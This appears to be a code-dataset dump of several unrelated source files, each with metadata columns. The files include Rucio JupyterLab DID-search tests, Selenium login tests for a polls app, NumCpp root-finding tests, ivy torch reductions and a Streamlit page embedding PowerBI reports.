{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
with pytest.raises(WildcardDisallowedException):
handler.search_did('scope', 'name*', 'all', 100)
rucio.search_did.assert_called_once_with('scope', 'name', 'all', 100)
def test_search_did__with_percent_wildcard__wildcard_disabled__should_raise_exception(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = False
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
with pytest.raises(WildcardDisallowedException):
handler.search_did('scope', 'name%', 'all', 100)
rucio.search_did.assert_called_once_with('scope', 'name', 'all', 100)
def test_get_handler__inputs_correct__should_not_error(mocker, rucio):
mock_self = MockHandler()
def mock_get_query_argument(key, default=None):
args = {
'namespace': MOCK_ACTIVE_INSTANCE,
'type': 'all',
'did': 'scope:name'
}
return args.get(key, default)
mocker.patch.object(mock_self, 'get_query_argument', side_effect=mock_get_query_argument)
class MockDIDSearchHandler(DIDSearchHandlerImpl):
@staticmethod
def search_did(scope, name, search_type='all', limit=100):
return [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
mocker.patch('rucio_jupyterlab.handlers.did_search.DIDSearchHandlerImpl', MockDIDSearchHandler)
def finish_side_effect(output):
finish_json = json.loads(output)
expected = [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
assert finish_json == expected, "Invalid finish response"
mocker.patch.object(mock_self, 'finish', side_effect=finish_side_effect)
rucio_api_factory = RucioAPIFactory(None)
mocker.patch.object(rucio_api_factory, 'for_instance', return_value=rucio)
mock_self.rucio = rucio_api_factory
DIDSearchHandler.get(mock_self)
calls = [call('did'), call('namespace'), call('type', 'collection')]
mock_self.get_query_argument.assert_has_calls(calls, any_order=True) # pylint: disable=no-member
def test_get_handler__wildcard_disabled__should_print_error(mocker, rucio):
mock_self = MockHandler()
def mock_get_query_argument(key, default=None):
args = {
'namespace': MOCK_ACTIVE_INSTANCE,
'type': 'all',
'did': 'scope:name'
}
return args.get(key, default)
mocker.patch.object(mock_self, 'get_query_argument', side_effect=mock_get_query_argument) # pylint: disable=no-member
class MockDIDSearchHandler(DIDSearchHandlerImpl):
@staticmethod
def search_did(scope, name, search_type='all', limit=100):
raise WildcardDisallowedException()
mocker.patch('rucio_jupyterlab.handlers.did_search.DIDSearchHandlerImpl', MockDIDSearchHandler)
def finish_side_effect(output):
finish_json = json.loads(output)
expected = {'error': 'wildcard_disabled'}
assert finish_json == expected, "Invalid finish response"
mocker.patch.object(mock_self, 'set_status', return_value=None)
mocker.patch.object(mock_self, 'finish', side_effect=finish_side_effect)
rucio_api_factory = RucioAPIFactory(None)
mocker.patch.object(rucio_api_factory, 'for_instance', return_value=rucio)
mock_self.rucio = rucio_api_factory
DIDSearchHandler.get(mock_self)
mock_self.set_status.assert_called_with(400) # pylint: disable=no-member
| 39.709497
| 122
| 0.669387
| 826
| 7,108
| 5.5
| 0.168281
| 0.047546
| 0.03698
| 0.028175
| 0.809817
| 0.794629
| 0.794629
| 0.785824
| 0.785824
| 0.785824
| 0
| 0.015297
| 0.181486
| 7,108
| 178
| 123
| 39.932584
| 0.765555
| 0.057119
| 0
| 0.735537
| 0
| 0
| 0.210912
| 0.01704
| 0
| 0
| 0
| 0
| 0.082645
| 1
| 0.099174
| false
| 0
| 0.049587
| 0.008264
| 0.190083
| 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe275cf48d39879d1086dc86394e426b9e12f80d
| 95
|
py
|
Python
|
src/models/log_reg.py
|
GavinNishizawa/ncaa-march-madness-2018
|
8324e48ba32c685d60a4eb97e0f10f664a88710b
|
[
"MIT"
] | 1
|
2018-03-08T23:44:18.000Z
|
2018-03-08T23:44:18.000Z
|
src/models/log_reg.py
|
GavinNishizawa/ncaa-march-madness-2018
|
8324e48ba32c685d60a4eb97e0f10f664a88710b
|
[
"MIT"
] | null | null | null |
src/models/log_reg.py
|
GavinNishizawa/ncaa-march-madness-2018
|
8324e48ba32c685d60a4eb97e0f10f664a88710b
|
[
"MIT"
] | null | null | null |
from sklearn import linear_model
def create():
return linear_model.LogisticRegression()
| 13.571429
| 44
| 0.778947
| 11
| 95
| 6.545455
| 0.818182
| 0.305556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 95
| 6
| 45
| 15.833333
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
fe29a25b7886d784cb30352340a9e5e6a74893f3
| 97
|
py
|
Python
|
Coursera_HSE_Py_Ass-7.2-Intersection-of-many.py
|
YuriRevin/Coursera_HSE_Py_Ass-7.2-Intersection-of-many
|
ea29df1cfd47f847249e017ad318ee0b92dcdc75
|
[
"MIT"
] | null | null | null |
Coursera_HSE_Py_Ass-7.2-Intersection-of-many.py
|
YuriRevin/Coursera_HSE_Py_Ass-7.2-Intersection-of-many
|
ea29df1cfd47f847249e017ad318ee0b92dcdc75
|
[
"MIT"
] | null | null | null |
Coursera_HSE_Py_Ass-7.2-Intersection-of-many.py
|
YuriRevin/Coursera_HSE_Py_Ass-7.2-Intersection-of-many
|
ea29df1cfd47f847249e017ad318ee0b92dcdc75
|
[
"MIT"
] | null | null | null |
print(*(sorted(set(map(int, input().split())) &
set(map(int, input().split())))))
| 32.333333
| 48
| 0.505155
| 12
| 97
| 4.083333
| 0.583333
| 0.244898
| 0.367347
| 0.571429
| 0.77551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206186
| 97
| 2
| 49
| 48.5
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
fe415ee8ca5c93713fefdc18d73f9b3beb430290
| 12,062
|
py
|
Python
|
test_login.py
|
Sonny-skyez/Selenium_test_-_Polls_app
|
5e166edbe6dcd9c23e6e75f349e0a249be1dfa39
|
[
"MIT"
] | null | null | null |
test_login.py
|
Sonny-skyez/Selenium_test_-_Polls_app
|
5e166edbe6dcd9c23e6e75f349e0a249be1dfa39
|
[
"MIT"
] | 1
|
2021-06-01T23:51:28.000Z
|
2021-06-01T23:51:28.000Z
|
test_login.py
|
Sonny-skyez/Selenium_test_-_Polls_app
|
5e166edbe6dcd9c23e6e75f349e0a249be1dfa39
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest
'''Test Login - second test suite, that tests all possible methods
of user login: login and no password, password but no login,
wrong password, wrong login etc.
This test suite contains 7 test cases.
Tested URL: https://polls-application.herokuapp.com/polls/'''
class Test_1_no_user_no_pass(unittest.TestCase):
'''Test case when there is no user and no password
in login attempt by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password:'])[1]/following::input[3]").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_2_login_pass_no_user(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_password").click()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("XXXXXX")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password:'])[1]/following::input[3]").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_3_login_user_no_pass(unittest.TestCase):
'''Test case with right username and wrong password
typed in by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password:'])[1]/following::input[3]").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_4_wrong_user_pass(unittest.TestCase):
'''Test case with wrong username and right password
typed in by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("sonnny")
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("XXXXXX")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_5_user_wrong_pass(unittest.TestCase):
'''Test case tests situation, when username is right,
and password is wrong'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("wrongpass")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_6_wrong_user_wrong_pass(unittest.TestCase):
'''Test case with wrong username and wrong password
typed in by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("xxx")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_7_login_logout(unittest.TestCase):
'''Test case with proper username and password;
successfull login attempt + logout.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("XXXXXX")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| 30.614213
| 112
| 0.628337
| 1,442
| 12,062
| 4.994452
| 0.083218
| 0.069425
| 0.118023
| 0.131908
| 0.926687
| 0.913357
| 0.907526
| 0.891697
| 0.889892
| 0.878089
| 0
| 0.003186
| 0.271431
| 12,062
| 394
| 113
| 30.614213
| 0.81634
| 0.035483
| 0
| 0.941379
| 0
| 0.010345
| 0.092098
| 0.022273
| 0
| 0
| 0
| 0
| 0.024138
| 1
| 0.144828
| false
| 0.068966
| 0.013793
| 0
| 0.303448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fe6670ca62545f6d92cb3493d1afaf20ed69ae0f
| 107
|
py
|
Python
|
yandex_kassa/utils.py
|
VladimirFilonov/django-yandex-kassa
|
1855ff6766648647d9f251856a54f9c8b572cb4d
|
[
"MIT"
] | null | null | null |
yandex_kassa/utils.py
|
VladimirFilonov/django-yandex-kassa
|
1855ff6766648647d9f251856a54f9c8b572cb4d
|
[
"MIT"
] | null | null | null |
yandex_kassa/utils.py
|
VladimirFilonov/django-yandex-kassa
|
1855ff6766648647d9f251856a54f9c8b572cb4d
|
[
"MIT"
] | 1
|
2019-06-10T11:58:49.000Z
|
2019-06-10T11:58:49.000Z
|
# -*- coding: utf-8 -*-
from uuid import uuid4
def get_uuid():
return str(uuid4()).replace('-', '')
| 13.375
| 40
| 0.570093
| 14
| 107
| 4.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034884
| 0.196262
| 107
| 7
| 41
| 15.285714
| 0.662791
| 0.196262
| 0
| 0
| 0
| 0
| 0.011905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
fe696877f9b8146c3805d1678091e0ad1abf6fa4
| 86
|
py
|
Python
|
buy_lambo/__init__.py
|
iamnapo/buy-lambo
|
f823f1b3135fc9a631751451ecc5e5ccc3b526aa
|
[
"MIT"
] | 9
|
2019-04-22T06:20:14.000Z
|
2021-02-11T10:08:27.000Z
|
buy_lambo/__init__.py
|
iamnapo/buy-lambo
|
f823f1b3135fc9a631751451ecc5e5ccc3b526aa
|
[
"MIT"
] | null | null | null |
buy_lambo/__init__.py
|
iamnapo/buy-lambo
|
f823f1b3135fc9a631751451ecc5e5ccc3b526aa
|
[
"MIT"
] | 2
|
2020-05-23T05:59:35.000Z
|
2020-12-02T11:13:49.000Z
|
from .buy_lambo import buy_lambo
from .create_HODL_address import create_HODL_address
| 28.666667
| 52
| 0.883721
| 14
| 86
| 5
| 0.5
| 0.228571
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 86
| 2
| 53
| 43
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
feb19538c76a8836df9a3efe74dc6b5496e1b15d
| 3,116
|
py
|
Python
|
unitTests/testScripts/TestRoots.py
|
liute62/NumCpp
|
d6922b2b5e1f575021b0577aea1445e041ec7180
|
[
"MIT"
] | null | null | null |
unitTests/testScripts/TestRoots.py
|
liute62/NumCpp
|
d6922b2b5e1f575021b0577aea1445e041ec7180
|
[
"MIT"
] | null | null | null |
unitTests/testScripts/TestRoots.py
|
liute62/NumCpp
|
d6922b2b5e1f575021b0577aea1445e041ec7180
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.special as sp
from termcolor import colored
import sys
if sys.platform == 'linux':
sys.path.append(r'../lib')
else:
sys.path.append(r'../build/x64/Release')
import NumCpp
####################################################################################
def doTest():
print(colored('Testing Roots Module', 'magenta'))
print(colored('Testing bisection', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.bisection_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing brent', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.brent_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing dekker', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.dekker_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing newton', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.newton_roots(polyC, largestRoot)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing secant', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.secant_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
####################################################################################
if __name__ == '__main__':
doTest()
| 36.658824
| 90
| 0.588254
| 378
| 3,116
| 4.814815
| 0.164021
| 0.105495
| 0.065934
| 0.104396
| 0.825275
| 0.825275
| 0.825275
| 0.825275
| 0.825275
| 0.825275
| 0
| 0.02549
| 0.181643
| 3,116
| 84
| 91
| 37.095238
| 0.688235
| 0
| 0
| 0.69863
| 0
| 0
| 0.087517
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0.068493
| 0.068493
| 0
| 0.082192
| 0.219178
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22916b872f43cbac0dbeafcca8a941ef116be126
| 1,372
|
py
|
Python
|
ivy/functional/backends/torch/utility.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy/functional/backends/torch/utility.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/torch/utility.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
# global
import ivy
import torch
from typing import Union, Optional, Tuple, List
# noinspection PyShadowingBuiltins
def all(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int], List[int]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
x = x.type(torch.bool)
if axis is None:
num_dims = len(x.shape)
axis = list(range(num_dims))
if isinstance(axis, int):
return torch.all(x, dim=axis, keepdim=keepdims, out=out)
dims = len(x.shape)
axis = [i % dims for i in axis]
axis.sort()
for i, a in enumerate(axis):
x = torch.all(x, dim=a if keepdims else a - i, keepdim=keepdims, out=out)
return x
# noinspection PyShadowingBuiltins
def any(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int], List[int]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
x = ivy.asarray(x).type(torch.bool)
if axis is None:
num_dims = len(x.shape)
axis = list(range(num_dims))
if isinstance(axis, int):
return torch.any(x, dim=axis, keepdim=keepdims, out=out)
dims = len(x.shape)
axis = [i % dims for i in axis]
axis.sort()
for i, a in enumerate(axis):
x = torch.any(x, dim=a if keepdims else a - i, keepdim=keepdims, out=out)
return x
| 28
| 81
| 0.618076
| 204
| 1,372
| 4.137255
| 0.215686
| 0.078199
| 0.037915
| 0.061611
| 0.810427
| 0.810427
| 0.810427
| 0.810427
| 0.810427
| 0.810427
| 0
| 0
| 0.248542
| 1,372
| 48
| 82
| 28.583333
| 0.818623
| 0.052478
| 0
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.073171
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22ac21c25c5178c32cf1d9c48e38932ce7c9c8f9
| 2,775
|
py
|
Python
|
otros.py
|
matiaslhlab/pydaychile2020_streamlit
|
223fac440ad5fa8897574b75ef19ca898cee6520
|
[
"Apache-2.0"
] | 2
|
2021-01-15T20:24:09.000Z
|
2021-03-08T17:06:14.000Z
|
otros.py
|
matiaslhlab/pydaychile2020_streamlit
|
223fac440ad5fa8897574b75ef19ca898cee6520
|
[
"Apache-2.0"
] | null | null | null |
otros.py
|
matiaslhlab/pydaychile2020_streamlit
|
223fac440ad5fa8897574b75ef19ca898cee6520
|
[
"Apache-2.0"
] | 1
|
2020-12-09T22:50:47.000Z
|
2020-12-09T22:50:47.000Z
|
import streamlit as st
import dtale
from dtale.views import startup
import numpy as np
import pandas as pd
def write():
with st.spinner("Cargando Otros Elementos ..."):
st.title("Otros elementos de Streamlit")
st.header("Reportes en PowerBI")
url1="https://app.powerbi.com/view?r=eyJrIjoiMDA4NGFhNmEtZDE4Mi00MWNhLTg5OTMtMWE2MzYxNTVmMTFlIiwidCI6ImI3M2IxZDZlLTIxZDUtNGUzOC1iMjM5LTgxMzRkOWQyYmY3OCIsImMiOjh9"
st.subheader("Podemos integrar un reporte realizado en PowerBI (de 800x540)")
st.markdown('''
<iframe width="840" height="540" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>
''' % url1, unsafe_allow_html=True)
st.write("código:")
st.code("""url1="https://app.powerbi.com/view?r=eyJrIjoiMDA4NGFhNmEtZDE4Mi00MWNhLTg5OTMtMWE2MzYxNTVmMTFlIiwidCI6ImI3M2IxZDZlLTIxZDUtNGUzOC1iMjM5LTgxMzRkOWQyYmY3OCIsImMiOjh9"
st.subheader("Podemos tener un reporte de 800x540")
st.markdown('''
<iframe width="840" height="540" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>''' % url1, unsafe_allow_html=True)""")
url2="https://app.powerbi.com/view?r=eyJrIjoiMjEwYjgzNWUtZGQ4Ni00ODMwLWI0NjgtNzk3NjkxODIwNDM4IiwidCI6IjFmZjk0MGQ4LWFkOGEtNDNkZi1iZjQxLWI2OThkMWJkODVmNiIsImMiOjh9"
st.subheader("O también algo tener el reporte un poco más pequeño (de 560x360)")
st.markdown("""
<iframe width="560" height="360" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>
""" % url2, unsafe_allow_html=True)
st.write("código:")
st.code('''url2="https://app.powerbi.com/view?r=eyJrIjoiMjEwYjgzNWUtZGQ4Ni00ODMwLWI0NjgtNzk3NjkxODIwNDM4IiwidCI6IjFmZjk0MGQ4LWFkOGEtNDNkZi1iZjQxLWI2OThkMWJkODVmNiIsImMiOjh9"
st.subheader("O también algo más pequeño de 560x360")
st.markdown("""
<iframe width="560" height="360" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>""" % url2, unsafe_allow_html=True)''')
st.header("Dataframes Interactivos en D-TALE")
st.markdown("""D-Tale es una herramienta Open Source que permite ver, analizar y modificar de una manera fácil estructuras de datos en Pandas. Para más información ver su [github](https://github.com/man-group/dtale)""")
df=pd.read_csv(r'dataset/indian_liver.csv')
startup(data_id="1", data=df)
st.markdown("""<iframe width="840" height="540" src="/dtale/main/1" />""",unsafe_allow_html=True)
st.write("código:")
st.code('''st.markdown("""D-Tale es una herramienta Open Source que permite ver, analizar y modificar de una manera fácil estructuras de datos en Pandas. Para más información ver su [github](https://github.com/man-group/dtale)""")
